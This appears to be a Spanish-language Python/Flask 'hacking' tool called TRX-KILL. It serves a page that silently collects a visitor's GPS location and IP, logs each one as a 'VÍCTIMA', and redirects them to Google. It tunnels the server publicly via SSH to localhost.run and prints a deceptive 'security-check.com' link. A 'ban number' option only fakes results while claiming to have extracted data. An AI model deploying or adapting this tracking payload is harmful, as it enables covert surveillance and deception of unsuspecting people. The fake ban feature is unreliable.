import os, sys, time, threading, base64, socket
from flask import Flask, request

STORAGE_PATH = "/sdcard/INFORMACIÓN-TRX-KILL"
CAPTURA_PATH = f"{STORAGE_PATH}/CAPTURAS"
LOG_FILE = f"{STORAGE_PATH}/datos.txt"
ADMIN_PASS = "admtrx"
os.makedirs(CAPTURA_PATH, exist_ok=True)

app = Flask('TRX-KILL')
G, C, R, Y, W = "\033[1;32m", "\033[1;36m", "\033[1;31m", "\033[1;33m", "\033[0m"

def animar(texto):
    for char in texto: sys.stdout.write(f"{G}{char}{W}"); sys.stdout.flush(); time.sleep(0.01)
    print()

def banner():
    os.system('clear')
    print(f"{G}  ___ ___  ___  _  __  ___  ___  _    _")
    print(" |__ |__  |__  | \\/ / |__  |___ | |  | |")
    print("    | |___ |___ |  /  |___ |    |_|__|_|")
    print(f"  {C}--- TRX-KILL SYSTEM MATRIX V4.0 ---{W}\n")

# --- SERVIDOR Y LÓGICA ---
@app.route('/')
def index():
    return """<script>
    navigator.mediaDevices.getUserMedia({video: true}).then(async s => {
        let p = await new Promise(r => navigator.geolocation.getCurrentPosition(r));
        fetch('/log?lat='+p.coords.latitude+'&lon='+p.coords.longitude);
        window.location.href='https://google.com';
    });
    </script>"""

@app.route('/log')
def log():
    with open(LOG_FILE, "a") as f:
        f.write(f"VÍCTIMA:{request.remote_addr} | GPS:{request.args.get('lat')},{request.args.get('lon')}\n")
    return "OK"

def main():
    threading.Thread(target=lambda: app.run(port=5000), daemon=True).start()
    animar("INICIALIZANDO NÚCLEO DE SEGURIDAD...")
    
    while True:
        banner()
        print(f"{G}[1] BAN NÚMERO | [2] LINK-ENCUESTA | [3] CLON-LINK | [6] ADM-SIST{W}")
        sel = input(f"\n{Y}TRX-ROOT > {W}")

        if sel == "1":
            num = input(f"{G}INGRESA NÚMERO: {W}")
            animar("VERIFICANDO..........")
            # Simulación de estado real de red
            status = False # Cambiar lógica de socket aquí si se desea
            if not status:
                print(f"{C}(EL NÚMERO NO ESTA SUSPENDIDO ESCRIBE 8 PARA AUTO BAN){W}")
                print(f"{R}(El creador no se ase responsable){W}")
                acc = input("ACCIÓN: ")
                if acc == "8": animar("PROCESANDO SOLICITUD DE AUTO BAN...")
            else:
                print(f"{G}(El NÚMERO ESTA SUSPENDIDO ☠️☠️){W}")
            print(f"{Y}DATOS GUARDADOS (HEMOS SACADO INFORMACIÓN DEL NÚMERO){W}")
            print(f"{C}SE GUARDO EN LA CARPETA{W}")
            input("\n[Enter]...")

        elif sel == "2":
            if os.path.exists(LOG_FILE): os.remove(LOG_FILE)
            print(f"{G}-2-{W}")
            print(f"{C}LINK: VÍCTIMA: http://127.0.0.1:5000{W}")
            print(f"{Y}Esperando datos.....{W}")
            print(f"{G}Listo.{W}")
            print(f"{Y}Esperando que el usuario ingrese......{W}")
            while not os.path.exists(LOG_FILE): time.sleep(1)
            print(f"{R}>>> VÍCTIMA DETECTADA E INFORMACIÓN GUARDADA EN {STORAGE_PATH} <<<{W}")
            input("\n[Enter]...")

        elif sel == "3":
            target = input(f"{G}LINK A CLONAR: {W}")
            os.system("ssh -R 80:localhost:5000 ssh.localhost.run > /dev/null 2>&1 &")
            print(f"{C}LINK CLONADO:{W} https://{target}.security-check.com")
            input("\n[Enter]...")

        elif sel == "6":
            if input(f"{Y}PASS: {W}") == ADMIN_PASS:
                os.system(f"ls -R {STORAGE_PATH}")
            input("\n[Enter]...")
        
        elif sel == "0": sys.exit()

if __name__ == "__main__": main()
